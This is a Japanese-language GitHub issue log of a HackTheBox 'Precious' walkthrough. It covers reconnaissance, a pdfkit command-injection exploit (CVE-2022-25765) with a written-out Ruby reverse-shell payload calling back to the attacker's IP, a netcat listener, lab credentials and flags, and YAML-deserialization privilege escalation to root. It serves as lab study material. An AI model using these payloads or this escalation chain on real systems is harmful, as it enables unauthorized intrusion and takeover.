search

roaris / ctf-log

0 stars 0 forks source link

HackTheBox: Precious (Machine Easy) #36

Open roaris opened 4 months ago

roaris commented 4 months ago

https://app.hackthebox.com/machines/Precious

$ nmap -sC -sV -Pn 10.10.11.189
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-05 15:09 JST
Nmap scan report for 10.10.11.189
Host is up (0.17s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 84:5e:13:a8:e3:1e:20:66:1d:23:55:50:f6:30:47:d2 (RSA)
|   256 a2:ef:7b:96:65:ce:41:61:c4:67:ee:4e:96:c7:c8:92 (ECDSA)
|_  256 33:05:3d:cd:7a:b7:98:45:82:39:e7:ae:3c:91:a6:58 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Did not follow redirect to http://precious.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.69 seconds
roaris commented 4 months ago

10.10.11.189にアクセスすると、precious.htbにリダイレクトするので、/etc/hostsに追加しておく

10.10.11.189 precious.htb
roaris commented 4 months ago

WebページをPDFに変換するらしい http:\//example.comとかhttp:\//10.10.11.189とかhttp:\//127.0.0.1を入れてみたが、Cannot load remote URLと出てくる

レスポンス中のX-Powered-ByヘッダはPhusion Passenger(R) 6.0.15で、X-RuntimeヘッダはRubyとある

roaris commented 4 months ago

gobusterは出てこなかった

$ gobuster dir --url http://precious.htb --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://precious.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 43432 / 87665 (49.54%)[ERROR] Get "http://precious.htb/8651": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://precious.htb/7896": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
[ERROR] Get "http://precious.htb/xCH-video_games": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
Progress: 87664 / 87665 (100.00%)
===============================================================
Finished
===============================================================

Nginx 1.18.0でexploit-dbを調べたが出てこず しかし、nginx 1.18.0 exploitでGoogle検索すると、CVE-2021-23017が出てきた DNSレスポンスの処理に関連した脆弱性とのこと 今回のアプリケーションは入力したURLの名前解決を行うだろうから、この脆弱性を突く可能性が高い POCはmetasploitにもなかったけど、GitHubで発見 https://github.com/M507/CVE-2021-23017-PoC

roaris commented 4 months ago

--dns_serverには何を指定したら良いんだ?自分のIPで良いのかな 動かした状態で、URLを送信してみたが、WARNINGが出て続けるだけで何も起きず

$ sudo python3 poc.py --target 10.10.11.189 --dns_server 10.10.14.20
[*] Sending poisoned ARP packets
[*] Listening
WARNING: Incompatible L3 types detected using <class 'scapy.layers.l2.ARP'> instead of <class 'scapy.layers.inet6.IPv46'> !
WARNING: Incompatible L3 types detected using <class 'scapy.layers.l2.ARP'> instead of <class 'scapy.layers.inet6.IPv46'> !
WARNING: more Incompatible L3 types detected using <class 'scapy.layers.l2.ARP'> instead of <class 'scapy.layers.inet6.IPv46'> !
WARNING: Incompatible L3 types detected using <class 'scapy.layers.l2.ARP'> instead of <class 'scapy.layers.inet6.IPv46'> !
...
roaris commented 4 months ago

exploit-dbにもあった https://www.exploit-db.com/exploits/50973 Nginx 1.20.0 - Denial of Service (DOS) とある DoSなの? https://www.cybersecurity-help.cz/vdb/SB2021052543 これにはRCEってあるけど

roaris commented 4 months ago

一応sshで、root/password, admin/passwordを試したが駄目

詰んだので、Guided Mode

roaris commented 4 months ago

Task1 : nginx is running with what additional software designed to serve web applications? A : Phusion Passenger

Task2 : Which HTTP response header reveals the underlying scripting Language of the web application? A : X-Runtime

Task3 : Which Ruby library are the PDF documents generated with? Hint : exiftool is a useful tool for looking at file metadata.

いや、PDF生成動いてないんだけど... 動いてたとしても、生成されたPDFに対してexiftoolを使おう、って発想にはならないな

roaris commented 4 months ago

https://forum.hackthebox.com/t/official-precious-discussion/268174/112 URLの末尾にスペースを入れるといけた 流石に意味不明すぎる

この2つのwriteupでもCannot load remote URLと出ているけど、ローカルでHTTPサーバを立ち上げてPDFの出力に成功している なんでローカルで立ち上げようって発想になるのか分からないな

確かにpython3 -m http.serverで立ち上げて、http:\//10.10.14.20:8000(10.10.14.20は自身のIP)を送信したら上手くいったけど、じゃあhttps:\//example.comやhttp:\//127.0.0.1で上手くいかないのはなんで?ってなるし、末尾にスペースをつけたら上手くいくのも意味不明

roaris commented 4 months ago 
$ exiftool 7f2k4ubtv66zx7stefxibjwgchcqa6xx.pdf
ExifTool Version Number         : 12.76
File Name                       : 7f2k4ubtv66zx7stefxibjwgchcqa6xx.pdf
Directory                       : .
File Size                       : 18 kB
File Modification Date/Time     : 2024:05:06 03:53:15+09:00
File Access Date/Time           : 2024:05:06 03:55:35+09:00
File Inode Change Date/Time     : 2024:05:06 04:00:02+09:00
File Permissions                : -rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Page Count                      : 1
Creator                         : Generated by pdfkit v0.8.6

Task3 : Which Ruby library are the PDF documents generated with? Hint : exiftool is a useful tool for looking at file metadata. A : pdfkit

exiftoolで見るのも個人的にはエスパー部分なんだよな 慣れるしかないか

roaris commented 4 months ago

exploit-dbでpdfkitを調べる https://www.exploit-db.com/exploits/51293 が出てきた コマンドインジェクションの脆弱性(ところで、RCEとコマンドインジェクションって同じ意味?) https://nvd.nist.gov/vuln/detail/CVE-2022-25765 v0.0.0から0.8.7.2の脆弱性なんで、今回のv0.8.6にも当てはまる

roaris commented 4 months ago 
$ searchsploit pdfkit
-------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                        |  Path
-------------------------------------------------------------------------------------- ---------------------------------
pdfkit v0.8.7.2 - Command Injection                                                   | ruby/local/51293.py
-------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

$ searchsploit -m 51293
  Exploit: pdfkit v0.8.7.2 - Command Injection
      URL: https://www.exploit-db.com/exploits/51293
     Path: /usr/share/exploitdb/exploits/ruby/local/51293.py
    Codes: CVE-2022–25765
 Verified: True
File Type: Python script, Unicode text, UTF-8 text executable

不正なペイロードを生成してくれるプログラムらしい

Usage:
  python3 exploit-CVE-2022–25765.py -c <command>
  python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port>
  python3 exploit-CVE-2022–25765.py -c <command> [-w <http://target.com/index.html> -p <parameter>]
  python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port> [-w <http://target.com/index.html> -p <parameter>]
  python3 exploit-CVE-2022–25765.py -h

Options:
  -c    Custom command mode. Provide command to generate custom payload with.
  -s    Reverse shell mode. Provide local IP and port to generate reverse shell payload with.
  -w    URL of website running vulnerable pdfkit. (Optional)
  -p    POST parameter on website running vulnerable pdfkit. (Optional)
  -h    Show this help menu.

とあるので、今回は-sオプションを使う

$ python3 51293.py -s 10.10.14.20 4444

        _ __,~~~/_        __  ___  _______________  ___  ___
    ,~~`( )_( )-\|       / / / / |/ /  _/ ___/ __ \/ _ \/ _ \
        |/|  `--.       / /_/ /    // // /__/ /_/ / , _/ // /
_V__v___!_!__!_____V____\____/_/|_/___/\___/\____/_/|_/____/....

UNICORD: Exploit for CVE-2022–25765 (pdfkit) - Command Injection
OPTIONS: Reverse Shell Mode
PAYLOAD: http://%20`ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("10.10.14.20","4444"))'`
LOCALIP: 10.10.14.20:4444
WARNING: Be sure to start a local listener on the above IP and port.
EXPLOIT: Copy the payload above into a PDFKit.new().to_pdf Ruby function or any application running vulnerable pdfkit.

PAYLOADに書かれている文字列をそのまま送信する

$ nc -lvp 4444
listening on [any] 4444 ...
connect to [10.10.14.20] from precious.htb [10.10.11.189] 59710
bash -i
bash: cannot set terminal process group (675): Inappropriate ioctl for device
bash: no job control in this shell
ruby@precious:/var/www/pdfapp$ whoami
whoami
ruby

リバースシェルを取れた

roaris commented 4 months ago

user.txtは読み取れない

ruby@precious:/home/henry$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
ruby@precious:/home/henry$ ls -l user.txt
ls -l user.txt
-rw-r----- 1 root henry 33 May  5 14:24 user.txt

sudo -lすると、よく分からん出力が出てくる

ruby@precious:/home/henry$ sudo -l
sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

sudo: a terminal is required to read the password; either use the -S option to read from standard input or configure an askpass helper
sudo: a password is required

su henryしようとしてもパスワードが求められる .bashrcとか.profileの中に書いてないか見たけど無かった

ruby@precious:/home/henry$ su henry
su henry
Password: password
su: Authentication failure
ruby@precious:/home/henry$ ls -al
ls -al
total 24
drwxr-xr-x 2 henry henry 4096 Oct 26  2022 .
drwxr-xr-x 4 root  root  4096 Oct 26  2022 ..
lrwxrwxrwx 1 root  root     9 Sep 26  2022 .bash_history -> /dev/null
-rw-r--r-- 1 henry henry  220 Sep 26  2022 .bash_logout
-rw-r--r-- 1 henry henry 3526 Sep 26  2022 .bashrc
-rw-r--r-- 1 henry henry  807 Sep 26  2022 .profile
-rw-r----- 1 root  henry   33 May  5 14:24 user.txt
roaris commented 4 months ago

分からんのでGuided Mode

Task4 : Which 2022 CVE applies to that specific version of pdfkit? A : CVE-2022-25765

Task5 : Which directory located in the running user's home directory is used by Bundler to store configuration files?

ruby@precious:~$ ls -al
ls -al
total 28
drwxr-xr-x 4 ruby ruby 4096 May  5 14:24 .
drwxr-xr-x 4 root root 4096 Oct 26  2022 ..
lrwxrwxrwx 1 root root    9 Oct 26  2022 .bash_history -> /dev/null
-rw-r--r-- 1 ruby ruby  220 Mar 27  2022 .bash_logout
-rw-r--r-- 1 ruby ruby 3526 Mar 27  2022 .bashrc
dr-xr-xr-x 2 root ruby 4096 Oct 26  2022 .bundle
drwxr-xr-x 3 ruby ruby 4096 May  5 14:24 .cache
-rw-r--r-- 1 ruby ruby  807 Mar 27  2022 .profile

A : .bundle

ruby@precious:~$ cd .bundle
cd .bundle
ruby@precious:~/.bundle$ ls
ls
config
ruby@precious:~/.bundle$ cat config
cat config
---
BUNDLE_HTTPS://RUBYGEMS__ORG/: "henry:Q3c1AqGHtoI0aXAYFH"

henryのパスワードらしきものが出てきたぞ これどうやったら見つけられるんだよ... こんなところにあるなんて思わないでしょ

su henryに成功

ruby@precious:~/.bundle$ su henry
su henry
Password: Q3c1AqGHtoI0aXAYFH
bash -i
bash: cannot set terminal process group (675): Inappropriate ioctl for device
bash: no job control in this shell
henry@precious:/home/ruby/.bundle$
henry@precious:/home/ruby/.bundle$ cd /home/henry
cd /home/henry
henry@precious:~$ cat user.txt
cat user.txt
4304a2ca40da1471df922052c3765ec2
roaris commented 4 months ago

sudo -lすると、/usr/bin/ruby /opt/update_dependencies.rbがroot権限で実行出来ることが分かった

henry@precious:~$ sudo -l
sudo -l
Matching Defaults entries for henry on precious:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User henry may run the following commands on precious:
    (root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb

/opt/update_dependencies.rbを書き換えれば良いと思ったけど、書き込み権限がない

henry@precious:~$ ls -l /opt/update_dependencies.rb
ls -l /opt/update_dependencies.rb
-rwxr-xr-x 1 root root 848 Sep 25  2022 /opt/update_dependencies.rb
roaris commented 4 months ago

また詰んだのでGuided Mode

Task7 : Which command can henry run with sudo, without providing a password? A : /usr/bin/ruby /opt/update_dependencies.rb

Task8 : Which is the name of the file that allows for user-controlled input to the update_dependencies.rb script? Hint : There's a reference to a particular file, which is specified without an absolute path.

henry@precious:~$ cat /opt/update_dependencies.rb
cat /opt/update_dependencies.rb
# Compare installed dependencies with those specified in "dependencies.yml"
require "yaml"
require 'rubygems'

# TODO: update versions automatically
def update_gems()
end

def list_from_file
    YAML.load(File.read("dependencies.yml"))
end

def list_local_gems
    Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
end

gems_file = list_from_file
gems_local = list_local_gems

gems_file.each do |file_name, file_version|
    gems_local.each do |local_name, local_version|
        if(file_name == local_name)
            if(file_version != local_version)
                puts "Installed version differs from the one specified in file: " + local_name
            else
                puts "Installed version is equals to the one specified in file: " + local_name
            end
        end
    end
end
henry@precious:/home/ruby$ ls /opt
ls /opt
sample
update_dependencies.rb
henry@precious:/opt/sample$ ls
ls
dependencies.yml
henry@precious:/opt/sample$ cat dependencies.yml
cat dependencies.yml
yaml: 0.1.1
pdfkit: 0.8.6

A : dependencies.yml (適当に打ったら正解だった)

dependencies.ymlで何をするんだ?

roaris commented 4 months ago

分からなかったので、https://qiita.com/schectman-hell/items/cd1c9eb16a86ae71ae51 を見た ruby yaml privilege escalationで調べると、https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/ruby-privilege-escalation/ が出てきた git_setの部分をbash -iにして、python3 -m http.server経由でダウンロードする dependencies.ymlは相対パスで参照されるので、どこにおいてもOK

henry@precious:~$ wget http://10.10.14.20:8000/dependencies.yml
wget http://10.10.14.20:8000/dependencies.yml
--2024-05-05 16:15:39--  http://10.10.14.20:8000/dependencies.yml
Connecting to 10.10.14.20:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 607 [application/yaml]
Saving to: ‘dependencies.yml’

     0K                                                       100%  185M=0s

2024-05-05 16:15:40 (185 MB/s) - ‘dependencies.yml’ saved [607/607]

henry@precious:~$ sudo /usr/bin/ruby /opt/update_dependencies.rb
sudo /usr/bin/ruby /opt/update_dependencies.rb
sh: 1: reading: not found
bash: cannot set terminal process group (675): Inappropriate ioctl for device
bash: no job control in this shell
root@precious:/home/henry# cd /root
cd /root
root@precious:~# cat root.txt
cat root.txt
9b47fec59e700c3022e647fd6eb15266

root.txtが取れた

ちなみにuser.txtはsshにhenry / Q3c1AqGHtoI0aXAYFH でログインすることでも取得出来た

roaris commented 4 months ago

解き方まとめ

  1. 外部のURLやhttp:\//127.0.0.1を指定しても、エラーになってPDFを出力することが出来ないので、ローカルでHTTPサーバを立てて、そのURLを指定する
  2. PDFをexiftoolで確認し、pdfkitが使われていることを確認する
  3. exploit-dbでpdfkitを調べて、コマンドインジェクションの脆弱性を見つける
  4. リバースシェルして、rubyユーザの権限を取得
  5. ls -alして、.bundleディレクトリの存在に気づき、その中にhenryユーザのパスワードがあることを気づく
  6. 5で得たパスワードを使って、su henryでhenryユーザに切り替わり、user.txtをゲット
  7. sudo -lを確認して、/usr/bin/ruby /opt/update_dependencies.rb がroot権限で実行出来るのを確認
  8. /opt/update_dependencies.rbの中身を確認し、YAML読み込み部分で権限昇格出来ないのではないかと考える
  9. 読み込み時にシェルを起動するような不正なYAMLを作成し、sudo /usr/bin/ruby /opt/update_dependencies.rbでrootユーザに昇格し、root.txtをゲット

8はまあ経験不足として、1, 2, 5は出来る気がしないなあという感じ